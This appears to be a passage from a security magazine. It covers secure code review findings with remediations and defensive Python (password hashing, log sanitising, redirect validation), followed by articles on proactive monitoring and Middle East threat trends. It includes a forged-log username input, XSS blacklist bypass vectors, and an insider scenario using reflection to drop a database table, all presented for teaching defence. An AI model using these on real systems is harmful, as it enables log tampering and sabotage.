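    """Recompute with the stored parameters and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def needs_rehash(stored: str, iterations: int = ITERATIONS) -> bool:
    """True when a record was made with fewer iterations than the current policy; the
    application re-hashes it on the user's next successful login."""
    return int(stored.split("$")[1]) < iterations
```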

8. Bypassing Authentication
In Figure 10 you can see that the session token’s value is stored in a hidden field, which can easily be retrieved by a MITM. An attacker can use the session token of the victim to bypass the authentication process and gain access to the victim’s profile.

Figure 10: User ID getting passed as cookie

Remediation: Care should be taken that proper session management is followed. The session token should expire after some time. The session token should be a random and long sequence that is difficult to guess. The cookie attributes should be properly set.

9. Data Validation
Improper Input Validation: many developers sometimes use a blacklisting technique, which is not a good practice. Consider the code displayed in Figure 11: you can see a blacklist provided by the developer. He is blacklisting the script pattern, the JavaScript pattern, eval and onload, but he has not included onmouseover and many other attack vectors in the list.

Figure 11: Use of blacklisting

Remediation: Why not use whitelisting? If I am providing validation for a phone number textbox, then why should I say “don’t allow alphabets and special characters” when instead I can say “allow only numbers”? Isn’t it simple? Just state what is valid.

Another recommendation given by the presenter was to remove the burden of validation from the developer and put it on secure frameworks such as Spring, or on secure APIs. Nowadays there are various APIs and frameworks available to do the job of input validation and output encoding.

10. Logging & Auditing
Improper Logging Technique: in Figure 12 we can see that the password is logged in plaintext.

Figure 12: Logging of password in plaintext

Log Obfuscation: another possible scenario can be the log line User ‘Ak’ logged in at 2:46pm, where ‘Ak’ comes from user input. This logging technique can be used as a tool by an attacker by giving the input ‘AD logged in at 2:40pm User Ak’, so the logged string becomes: User ‘AD logged in at 2:40pm User Ak’ logged in at 2:46pm. This helps to cover the tracks of the attacker by forging the logs.

Remediation: The logs should not contain elements coming from the user as input, as he can obfuscate the logs by giving malicious input in order to mask his activities. A password should never be logged as plaintext.

11. Improper Use of Reflection
What is reflection? Reflection is the ability to examine or modify the properties or behavior of an object at runtime.

Scenario of attack: I am a disgruntled employee, I am resigning, but I have been so frustrated with my job that I intend to harm the company without getting caught by the application’s logging. I create the page shown in Figure 13.
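For the log obfuscation scenario in item 10, an added example (not the reviewed code): the naive line beside one that strips control characters and quotes the user field, with small parsers showing that a forged value can produce a second record in the first format but stays inside one field in the second. The newline variant in the test goes beyond the article’s inline example, since it is the case that defeats line-based log review.

```python
import json
import re

CONTROL = re.compile(r"[\x00-\x1f\x7f]")
NAIVE_RECORD = re.compile(r"^User '(?P<user>.*)' logged in at (?P<time>.*)$", re.M)
SAFE_RECORD = re.compile(r'^event=login user=(?P<user>"(?:[^"\\]|\\.)*") time=(?P<time>\S+)$')


def naive_login_line(username: str, when: str) -> str:
    """The pattern from the article: the user-supplied name is dropped straight in."""
    return f"User '{username}' logged in at {when}"


def safe_login_line(username: str, when: str) -> str:
    """Control characters are replaced so the value cannot start another line, and the
    value is JSON-quoted so embedded quotes and spaces stay inside one field."""
    cleaned = CONTROL.sub("?", username)
    return f"event=login user={json.dumps(cleaned)} time={when}"


def parse_naive_log(text: str) -> list:
    """Read the naive format the way an analyst or grep would: one record per line."""
    return [m.groupdict() for m in NAIVE_RECORD.finditer(text)]


def parse_safe_log(text: str) -> list:
    """Read the structured format; json.loads undoes the quoting exactly."""
    out = []
    for line in text.splitlines():
        m = SAFE_RECORD.match(line)
        if m:
            out.append({"user": json.loads(m.group("user")), "time": m.group("time")})
    return out
```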

Figure 13: Creation of a malicious class by attacker

In Figure 13 you can see that a class ‘ReflectionandMore’ is created which has a constructor defined. In the definition of the constructor a connection to the database is made, and the next step is the deletion of some table. This class is not called anywhere in the application; therefore, when you run a code review tool on it, the tool will not consider it as malicious code and will leave it marked as dead code. Here comes the attack using reflection as a medium, refer to Figure 14. In the figure you can see that reflection is creating an instance of the class which is provided as user input. So the attacker calls this code (Figure 14) and gives the malicious class (Figure 13) as input. Thus, when the constructor is called, a JDBC connection is made and this ultimately leads to the deletion of the table.

Figure 14: Reflection to call the constructor of malicious class

Remediation: The application should have an authorization check for performing activities such as deletion or manipulation of the database. It is suggested that re-authentication should be prompted before performing such actions.

12. URL Redirection
Case: there are cases when developers make use of a good output encoding mechanism, that is c:out, to escape injections, but some remedies are applicable to some attacks only. In this case a URL has been taken by the application as input from a ‘GET’ request parameter (refer to the highlighted section of Figure 15). Even though the developer used quite a good mechanism to escape XSS-type attacks, he forgot to put a check on URL redirection; in such a case an attacker can give the URL of his phishing site as input to the GET request parameter. The resulting URL is then given to the victim, thus misguiding a legitimate user.

Figure 15: URL not getting validated

Remediation: Assume all input is malicious. Use an “accept known good” input validation strategy, i.e. use a whitelist of acceptable inputs that strictly conform to specifications. Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page. When the set of acceptable objects, such as file names or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual file names or URLs, and reject all other inputs.

13. SMTP Server Spamming
Case: it is bad to provide a hardcoded SMTP password in code, but it is worse to have no password defined for the SMTP server. If an attacker comes to know of it, he can use this vulnerability of the victim server to spam other parties’ mailboxes; here the web application hosting server becomes the medium of attack. In Figure 16 we can see that mail is being sent using an open relay SMTP server. An open relay allows anyone on the internet to send mail. They are really unpopular as they can be exploited for spamming.

Figure 16: Using open relay SMTP server

Remediation: Provide a strong password for the SMTP server, which should not be hardcoded.
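For item 12, an added example of the remediation (not the reviewed code): the request carries an opaque ID that is looked up in a fixed mapping, and where a URL must be accepted it is validated against the cases a redirect check has to refuse (other schemes, protocol-relative and backslash forms, embedded credentials, non-allow-listed hosts). The mapping entries, the allowed host and the addresses in the checks are placeholders.

```python
from urllib.parse import urlsplit

# Fixed mapping from opaque IDs to destinations, as the remediation recommends.
# Entries are placeholders for this example, not taken from the reviewed application.
REDIRECT_TARGETS = {
    "home": "/",
    "account": "/account/profile",
    "help": "https://help.example.com/start",
}
ALLOWED_EXTERNAL_HOSTS = {"help.example.com"}     # placeholder allow-list
SAFE_DEFAULT = "/"


def resolve_redirect(target_id: str):
    """Preferred form: the request names an ID, never a URL; unknown IDs yield None."""
    return REDIRECT_TARGETS.get(target_id)


def is_safe_redirect(url: str, allowed_hosts=ALLOWED_EXTERNAL_HOSTS) -> bool:
    """Fallback when a URL must be accepted: allow only same-site absolute paths or
    https URLs whose host is on the allow-list. Everything else is refused."""
    if not url or any(c in url for c in "\\\r\n\t "):
        return False                      # backslash and whitespace forms are ambiguous
    parts = urlsplit(url)
    if parts.scheme == "" and parts.netloc == "":
        return url.startswith("/") and not url.startswith("//")   # same-site path only
    if parts.scheme != "https" or not parts.hostname:
        return False                      # javascript:, http:, data: and //host forms
    if parts.username or parts.password:
        return False                      # https://allowed@evil/ style confusion
    try:
        port = parts.port
    except ValueError:
        return False
    if port not in (None, 443):
        return False
    return parts.hostname.lower() in allowed_hosts


def redirect_location(params: dict) -> str:
    """Value for the Location header: mapped ID first, then a validated URL, else default."""
    by_id = resolve_redirect(params.get("to", ""))
    if by_id:
        return by_id
    url = params.get("url", "")
    return url if is_safe_redirect(url) else SAFE_DEFAULT
```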



Best Practice

Defining a Proactive Security Monitoring Strategy

About The Author

Harris D. Schwartz Safeway Corporate Information Security Lead, Incident Response & Cyber Threat Intelligence


An information security professional with 20+ years of private sector experience, specializing in the development and implementation of world-class incident response, investigations and cyber threat intelligence programs. Harris is currently the leader for incident response and cyber threat intelligence at Safeway, Inc., one of the largest grocery retail companies in North America.


As the realm of cyber security threats continues to change, trend, increase and, in some instances, become targeted, it is important for companies to modify or change their defense strategy in alignment with industry trends. In my 20+ years in the corporate and information security industry, working proactively has had far better advantages than sitting around and waiting for something to happen. There are still companies today that choose the reactive route, because their mindset is either stuck in an old culture that has worked for the last number of years or because they choose not to know what is happening in their networks and environment. In some cases, moving from an entirely reactive state to a proactive approach may still have its internal challenges with peers, your legal department and other groups within the company. It is important, as security professionals in a corporation, to constantly educate and build awareness with your peers and stakeholders, especially executive leadership and your legal department. When you have built the perfect relationship, or partnership, you will find that they will approach you and ask for your recommended strategy moving forward, essentially as a subject matter expert. It is unfortunate that, too many times, I have found peers afraid or scared of their executives or legal professionals. If this happens, making important decisions for your company will take time, and by the time you get around to accomplishing what you need to, it will be too late.

So what do I consider to be reactive vs. proactive? It is important to operate a SIEM (security information and event management) tool to which all of your various IT appliances and tools (firewalls, IDS/IPS, etc.) send their logs for alerting purposes. Most SIEM infrastructures aggregate and correlate these logs and, coupled with further rules, signatures and threat intelligence, can alert your security operations staff to notable security events on your network, which an analyst would then review, assess, triage and remediate as necessary. Every company will have a reactionary response to events of this nature. This model has been the norm for a long time, and it is simply not enough to ensure your network is free of attackers and unauthorized individuals. In some companies and organizations the security team manages the SIEM 100%, while others may augment staff with an MSSP (Managed Security Services Provider).

What else is necessary in today’s modern cyber world?

The other 80% of the rule is the proactive approach. What does proactive really mean? It can have different definitions from one person to another. I have always been a fan and proponent of proactive operations. One advantage is getting to know, on an intimate scale, what is normal activity on your network and, plainly, what is not normal: all the small, medium and large scale abnormalities, anomalies and unknowns of the network. The way to figure out what is normal and what is not is to dig into your network activity, utilize various technology tools and applications to support proactive monitoring, run down all anomalies and suspicious activity, conduct heightened monitoring around critical operations and systems in your enterprise, get to know the system administrators and ask questions.

I will give you an example. My team was using a known monitoring tool to keep an eye out for any outbound traffic that was deemed suspicious or out of the norm, e.g. beaconing traffic from an internal host to an external host or between two internal hosts. This type of activity could be evidence of an infected internal host talking to a command and control botnet or other malicious IP address. In this particular example, traffic was passing between two different internal hosts and some of it was attempting to access a privileged account. In the end, the investigation determined that although there was traffic between the two hosts, the access attempt to the privileged account was blocked, and on top of it all, the entire event turned out to be known network backup activity that occurs on the network late at night. These were circumstances we didn't know about, but now we do.
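As an added illustration of the run-down described above (example code, not the author's tooling), the following Python triages constructed connection-log lines: it flags host pairs whose traffic recurs at a regular period, counts attempts on privileged accounts and whether they were denied, and marks the pair as known baseline only when every event falls inside a window the system administrators have vouched for. The log format, addresses, account names and backup window are all assumptions.

```python
# Added example, not the author's tooling: triage regular internal-to-internal traffic against
# a baseline of known activity. Constructed sample log, format 'ISO-time src dst dport user result'.
from collections import defaultdict
from datetime import datetime, time
from statistics import mean, pstdev
SAMPLE_LOG = """\
2015-01-10T02:00:03 10.1.1.20 10.1.1.50 445 svc_backup OK
2015-01-10T02:05:02 10.1.1.20 10.1.1.50 445 svc_backup OK
2015-01-10T02:10:04 10.1.1.20 10.1.1.50 445 Administrator DENIED
2015-01-10T02:15:03 10.1.1.20 10.1.1.50 445 svc_backup OK
2015-01-10T09:12:41 10.1.1.77 10.1.1.50 445 jdoe OK"""
PRIVILEGED = {"Administrator", "root"}  # the sample's single Administrator attempt is denied
# Known-normal activity, assumed learned by asking the sysadmins: (src, dst, window start, window end).
BASELINE = [("10.1.1.20", "10.1.1.50", time(1, 0), time(4, 0))]  # nightly backup job

def parse(log):
    """Rows of (datetime, src, dst, dport, user, result)."""
    return [(datetime.fromisoformat(t), s, d, int(p), u, r)
            for t, s, d, p, u, r in (line.split() for line in log.splitlines())]

def in_baseline(src, dst, when):
    return any(src == s and dst == d and a <= when.time() <= b for s, d, a, b in BASELINE)

def find_beacons(rows, min_events=4, max_jitter=0.2):
    """Return {(src, dst): period_seconds} for pairs whose inter-event gaps are regular."""
    by_pair = defaultdict(list)
    for ts, src, dst, *_ in rows:
        by_pair[(src, dst)].append(ts)
    beacons = {}
    for pair, times in by_pair.items():
        if len(times) >= min_events:
            times.sort()
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            if pstdev(gaps) / mean(gaps) <= max_jitter:  # low coefficient of variation
                beacons[pair] = round(mean(gaps))
    return beacons

def triage(log):
    """One finding per beaconing pair; 'baseline' only if every event is in a known window."""
    rows, findings = parse(log), []
    for (src, dst), period in find_beacons(rows).items():
        events = [r for r in rows if (r[1], r[2]) == (src, dst)]
        priv = [r for r in events if r[4] in PRIVILEGED]
        known = all(in_baseline(src, dst, r[0]) for r in events)
        findings.append({"src": src, "dst": dst, "period_s": period,
                         "privileged_attempts": len(priv),
                         "privileged_blocked": all(r[5] == "DENIED" for r in priv),
                         "status": "baseline" if known else "investigate"})
    return findings
```

The same pair seen at a time of day outside the agreed window comes back as "investigate", which is the point of recording what the administrators told you rather than silencing the alert.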

Why else is proactive monitoring important?

Well, if your company or entity is one that deals in sensitive information, whether that is nation state secrets, customer personal information (what we call PII in the Americas), credit card and payment data (PCI) and/or patient and medical data (ePHI), this information in the wrong hands can cripple your company and business, cost you millions, damage your reputation in seconds and bring all sorts of legal troubles to your executives and board members. Proactive monitoring along these lines should be a combination of technology (tools and applications) and human interaction and surveillance of your network environment. Let's face it, breaches and incidents typically occur when a company least expects them. Industry trends showed that most attacks occurred Friday to Sunday; now attackers are taking different approaches to attacks and breaches. While they are deploying malicious code that operates in stealth mode, they still have to exfiltrate your data, in slow and steady moves so that the activity is not "detectable". This is why security professionals need to take a different stance with regard to cyber security: "always under attack" or "imminent danger". Being aware and proactive will allow companies to observe, identify, prevent and mitigate cyber threats much faster than if they operated in a 100% reactionary stance.

Maintaining a proactive strategy also requires good relationships and partnerships among your peers, support groups and stakeholders within your organization. If you haven't started building those relationships yet, you should start as soon as you can. The days of keeping to ourselves and within a silo are well over. That approach won't help but will hinder your efforts. Building a notification list of important people to contact in the organization will only assist in your proactive efforts, and afford you the ability to respond quickly to a real live security incident.


Best Practice

Information Security Is a Challenge in The Middle East

About The Author

Abdul Rehman, Senior Consultant (IS/IT). 10 years of experience in Information Security and Technology, mainly working with ministries and authorities of Oman. Expert in Information Security Audits, Security Assessments and Digital Forensics.

2014 Security Recap

2014 has passed and we have just entered 2015. If you look at 2014 from the perspective of information security, the picture is a bit scary. Heartbleed and ShellShock gave everybody a surprise. Giant corporates and big empires spent a lot of man-days on evaluation, risk assessments, patching and other activities to make sure their information was secure. Another surprising and shocking thing was the discovery of critical vulnerabilities in open source software. These vulnerabilities impacted the whole computing world. And then there were the cyber-attacks: the US-China cock-fight/cyber war, Chinese vs. Russian hackers, stories of the Syrian Cyber Army, the “Big Achievements of Anonymous Group” and other hacking incidents have made 2014 a memorable year.


Points to Ponder

According to the IBM Cyber Security Intelligence Index, an average large company had to filter through 1,400 cyberattacks weekly to identify the 1.7 incidents that can do harm.

An annual report by TrendMicro (a security software company) says the top threat in the Middle East is adware, while email reputation queries, also known as spam email, totaled 24 million in the third quarter (Q3) of 2014, including 14 million in Saudi Arabia, 8 million in the UAE, and 2 million in the rest of the Middle East. The region had 1.5 million malware detections in Q3 2014, with online banking malware, ransomware, and malicious websites and mobile apps presenting high risk. According to the report, targeted attack campaigns will continue to multiply in 2015, after cybercriminals achieved noteworthy breaches via targeted attacks in the US.

As per another report by Kaspersky, altogether in the first quarter of 2014 Kaspersky Lab products neutralized more than 34.9 million cyber-attacks and malware infections on computers and mobile devices in the Middle East, representing an increase of almost 10% year-on-year (2013's figure was 31.6 million). Kaspersky Lab also presented statistics for the Middle East in the first quarter of 2014. The Kingdom of Saudi Arabia has the highest total number of local and online malware detections, closely followed by the United Arab Emirates. Bahrain and Lebanon were the safest countries, according to these statistics, with the region's lowest threat levels.

http://me.kaspersky.com/en/about/news/virus/2014/Kaspersky_Lab_reports_on_cyber_threats_in_the_Middle_East_in_the_first_quarter_of_2014

http://me.kaspersky.com/en/about/news/virus/2014/the-number-of-cyberthreats-in-the-Middle-East-continues-to-grow

Hackers Attracted towards the Middle East

Apart from the well-known names in cyber-space like the US, China, Russia etc., the number of cyber-attacks increased in the Middle East region in 2014, and it will continue to increase in 2015 as well, for many obvious reasons. A sample of 30 of the world's largest Fortune 500 companies generated visitor traffic to websites that host malware, with a sharp rise in malware attacks on the Middle East's oil and gas sector. Various websites of KSA, Oman and UAE were publicly defaced in 2014. As business opportunities grow in the Middle East region, they bring more complex security threats. Businesses across the Middle East are at high risk, with 65% of employees having no awareness of information security, Cisco's recent Middle East ICT Security Study says.

Moral of the Story

Information security should be a board room discussion in 2015. Sheer planning initiatives need to be taken from the top in both government and business sectors. Information security should not be considered as IT security only. Steps should be taken to raise information security awareness among employees.

It should be made clear this year that information security is critical to today's business and that any compromise of information assets can damage organizations. The key initiative is effective enterprise-wide risk management and awareness. Identify what information needs to be protected. What are the possible risks to your information, and how much risk can you accept? What security measures do you need? Do the security measures work after implementation? Be a hard target to exploit and learn from the mistakes you made in 2014. May the God of all SECURITY be with you.
